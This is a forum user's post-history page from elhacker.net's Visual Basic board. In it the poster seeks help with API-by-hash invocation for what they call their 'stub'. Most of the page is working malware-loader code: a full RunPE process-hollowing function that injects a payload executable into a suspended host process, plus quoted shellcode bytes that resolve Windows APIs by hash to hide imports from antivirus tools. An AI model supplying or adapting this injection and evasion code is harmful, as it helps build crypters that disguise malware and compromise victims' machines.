elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8
61  Programación / Programación Visual Basic / Re: [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 23:55 pm
@BlackZeroX (Astaroth)
Thanks a lot man!
62  Programación / Programación Visual Basic / Re: [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 23:21 pm
Modded CallAPIByName by cobein.
63  Programación / Programación Visual Basic / Re: [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 22:44 pm
Thanks for your answer man but its not that that I want. I want to Invoke the API using CallAPIByName.
64  Programación / Programación Visual Basic / [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 22:17 pm
I've tried almost everything to Invoke that API and I always failed...

I suceed with InternetOpen/InternetOpelUrl/InternetCloseHandle but not that one :/

Código:
Private Declare Function InternetReadFile Lib "wininet.dll" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal dwNumberOfBytesToRead As Long, lNumberOfBytesRead As Long) As Integer

        bDoLoop = InternetReadFile(hInternetOpen, strArray, Len(strArray), lNumberOfBytes)

Can anyone help please?
65  Programación / Programación Visual Basic / Re: mMemory - WriteProcessMemory/vbaCopyBytes/RtlMoveMemory replacement [NOAPI!!!] en: 6 Noviembre 2011, 02:34 am
Thanks a lot man for your example but how to "Unlock BlockMemory" ?

I'm getting that message...
66  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 1 Noviembre 2011, 19:13 pm
Cita de: Karcrack en  1 Noviembre 2011, 19:01 pm
The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...

I don't know with which API's it's not working, how do I know? I have Invoked RunPE/Resource and a few APIs in Main:

Main Module:
Código:
'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile) ---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024 ---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024

Resource Module:
Código:
'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType) ---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc) ---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal) ---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc) ---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size ---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal ---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod ---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hMod

And all API's in kRunPE:
Código:
Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
    Dim hModuleBase             As Long
    Dim hPE                     As Long
    Dim hSec                    As Long
    Dim ImageBase               As Long
    Dim gNumC                       As Long
    Dim tSTARTUPINFO(16)        As Long
    Dim tPROCESS_INFORMATION(3) As Long
    Dim tCONTEXT(50)            As Long
    Dim KERNEL32          As String
    Dim NTDLL             As String

    KERNEL32 = "KERNEL32"
    NTDLL = "NTDLL"

    hModuleBase = VarPtr(bvBuff(0))

    If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function

    hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))

    If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function

    ImageBase = GetNumb(hPE + fClngW("&H34"))

    tSTARTUPINFO(0) = fClngW("&H44")
    
    'CreateProcessW
    Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
    
    'NtUnmapViewOfSection
    Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)

    'NtAllocateVirtualMemory
    Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))
    
    'NtWriteVirtualMemory
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)

    For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
        hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
        'NtWriteVirtualMemory
        Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
    Next gNumC

    tCONTEXT(0) = fClngW("65543")

    'NtGetContextThread
    Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
    
    'NtWriteVirtualMemory
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))

    tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))
    
    'NtSetContextThread
    Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
    
    'NtResumeThread
    Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)

    hProcess = tPROCESS_INFORMATION(0)
    fInjectExe = fClngW("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
    'NtWriteVirtualMemory
    Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
67  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 1 Noviembre 2011, 17:26 pm
Cita de: [L]ord [R]NA en  1 Noviembre 2011, 16:09 pm
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically

I have no idea on how to do this... Could you help me doing this please?
68  Programación / Programación Visual Basic / Re: mMemory - WriteProcessMemory/vbaCopyBytes/RtlMoveMemory replacement [NOAPI!!!] en: 1 Noviembre 2011, 17:13 pm
Thanks so much for this, I've tried to use it on your PatchAPI function but I can't get it working :( Could you give us a sample please?
69  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 1 Noviembre 2011, 14:30 pm
Cita de: Karcrack en  1 Noviembre 2011, 03:49 am
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...

Make sure you're generating the hashes using the complete function name... p.e MessageBoxA

I've generated the hashes correctly using each complete function name, I used the tool you shared with us.

I'm on Windows 7 x64 bits and I'm compiling in Native Code

I never got the CallAPIByHash working, never understood why :/

My Stub was using CallAPIByName and it was working...
70  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 31 Octubre 2011, 23:58 pm
Cita de: Karcrack en 22 Julio 2010, 18:53 pm
He hecho una pequeña actualizacion para un nuevo modulo RunPe en el que estoy trabajando, asi que aqui esta:
Código
  1. 'Karcrack , 22/07/10
  2. Option Explicit
  3. Private Type DWORD_L
  4.     D1      As Long
  5. End Type
  6.  
  7. Private Type DWORD_B
  8.     B1      As Byte:    B2      As Byte:   B3      As Byte:    B4      As Byte
  9. End Type
  10.  
  11. 'USER32
  12. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
  13.  
  14. Private bInitialized_Inv        As Boolean
  15. Private ASM_gAPIPTR(0 To 170)   As Byte
  16. Private ASM_cCODE(0 To 255)     As Byte
  17.  
  18. Private Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
  19.     Dim vItem                   As Variant
  20.     Dim bsTmp                   As DWORD_B
  21.     Dim lAPI                    As Long
  22.     Dim i                       As Long
  23.     Dim w                       As Long
  24.  
  25.     If Not bInitialized_Inv Then
  26.         For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
  27.                                 &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
  28.             ASM_gAPIPTR(i) = CByte(vItem)
  29.             i = i + 1
  30.         Next vItem
  31.         i = 0
  32.         bInitialized_Inv = True
  33.     End If
  34.  
  35.     lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
  36.  
  37.     If lAPI Then
  38.         For w = UBound(vParams) To LBound(vParams) Step -1
  39.             vItem = vParams(w)
  40.             bsTmp = SliceLong(CLng(vItem))
  41.             '// PUSH ADDR
  42.             ASM_cCODE(i) = &H68:            i = i + 1
  43.             ASM_cCODE(i) = bsTmp.B1:        i = i + 1
  44.             ASM_cCODE(i) = bsTmp.B2:        i = i + 1
  45.             ASM_cCODE(i) = bsTmp.B3:        i = i + 1
  46.             ASM_cCODE(i) = bsTmp.B4:        i = i + 1
  47.         Next w
  48.  
  49.         bsTmp = SliceLong(lAPI)
  50.         '// MOV EAX, ADDR
  51.         ASM_cCODE(i) = &HB8:                i = i + 1
  52.         ASM_cCODE(i) = bsTmp.B1:            i = i + 1
  53.         ASM_cCODE(i) = bsTmp.B2:            i = i + 1
  54.         ASM_cCODE(i) = bsTmp.B3:            i = i + 1
  55.         ASM_cCODE(i) = bsTmp.B4:            i = i + 1
  56.         '// CALL EAX
  57.         ASM_cCODE(i) = &HFF:                i = i + 1
  58.         ASM_cCODE(i) = &HD0:                i = i + 1
  59.         '// RET
  60.         ASM_cCODE(i) = &HC3:                i = i + 1
  61.  
  62.         Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
  63.     Else
  64.         Invoke = -1
  65.         'Err.Raise -1, , "Bad Hash or wrong DLL"
  66.     End If
  67. End Function
  68.  
  69. Private Function SliceLong(ByVal lLong As Long) As DWORD_B
  70.     Dim tL                      As DWORD_L
  71.  
  72.     tL.D1 = lLong
  73.     LSet SliceLong = tL
  74. End Function
  75.  

Saludos ;)

Thanks a lot for that code Karcrack, I tried to replace my call api by name by this one, I converted all api names to hash but then my stub gets broken. Is there anything else that has to be done?
Páginas: 1 2 3 4 5 6 [7] 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines